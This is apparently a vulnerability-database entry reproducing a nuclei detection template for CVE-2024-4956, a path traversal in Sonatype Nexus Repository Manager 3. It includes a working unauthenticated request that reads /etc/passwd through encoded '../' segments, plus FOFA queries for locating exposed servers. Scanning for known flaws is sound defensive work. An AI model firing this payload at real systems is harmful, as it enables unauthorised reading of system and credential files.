Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2024-4956
HistoryMay 23, 2024 - 6:24 a.m.

Sonatype Nexus Repository Manager 3 - Local File Inclusion

2024-05-2306:24:19
ProjectDiscovery
github.com
101
cve2024 nexus lfi cvss-high path-traversal unauthenticated attacker system-files vulnerability fixed-version-3.68.1 sonatype

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.7%

Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
id: CVE-2024-4956

info:
  name: Sonatype Nexus Repository Manager 3 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    Path Traversal in Sonatype Nexus Repository 3 allows an unauthenticated attacker to read system files. Fixed in version 3.68.1.
  reference:
    - https://x.com/phithon_xg/status/1793517567560335428?s=46&t=GMMfJwV8rhJHdcj2TUympg
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4956
    - https://support.sonatype.com/hc/en-us/articles/29416509323923
    - https://github.com/fkie-cad/nvd-json-data-feeds
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-4956
    cwe-id: CWE-22
    epss-score: 0.00044
    epss-percentile: 0.10128
    cpe: cpe:2.3:a:sonatype:nexus:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: sonatype
    product: nexus
    fofa-query:
      - title="Nexus Repository Manager"
      - title="nexus repository manager"
  tags: cve,cve2024,nexus,lfi,sonatype

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers:
      - type: dsl
        dsl:
          - regex('root:.*:0:0:', body)
          - contains(header, "application/octet-stream")
          - status_code == 200
        condition: and
# digest: 490a0046304402202a7b25f9491118611601e54fc059c402e3e33091cab3c23e78360700c3e111db022000eb7088fe6c09b5cb1896a2296d7331e0036e4686346643a7cf000e2b80315a:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.4 High

AI Score

Confidence

High

0.013 Low

EPSS

Percentile

85.7%